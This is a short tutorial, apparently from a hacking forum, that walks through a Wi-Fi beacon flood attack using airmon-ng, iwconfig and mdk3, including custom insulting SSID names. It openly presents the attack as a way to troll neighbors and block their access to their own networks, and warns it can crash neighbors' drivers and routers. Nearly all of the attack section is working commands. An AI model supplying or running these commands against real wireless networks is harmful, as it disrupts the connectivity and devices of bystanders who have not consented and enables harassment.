Note: If you run this long enough, you can crash yours and neighbors drivers and mess their routers up.> Explanation of Attack:
This will flood your neighbors list of networks with random access points names, or you can write up custom names like: "F YOU" or "I LOVE PONIES", etc. This is commonly used for trolling and attempting to block access for your neighbors to access their network.
> Lab and Requirements:
Basic knowledge of networking.
Exposure to the linux environment.
A network adapter that supports packet injection and monitor mode (master mode not needed).
A linux distribution with basic pentesting tools.
Firstly, let's start monitor mode by typing:
airmon-ng start <wireless interface>
Now, let's set the channel to 3 (it can be anything below 13):
iwconfig <monitor mode> channel <number>
Now let's begin the attack:
mdk3 <monitor mode> b -c <set channel> -m
Picture of attack:
Picture of how the AP's are being spammed (It spams on MACs, iPads, Androids, etc. Everything with a list of AP's are vulnerable):
Now, you want to spam the list with custom written names? Simply write up a list with the names and type in this:
mdk3 <monitor mode> b -c <set channel> -m -f <directory with the list>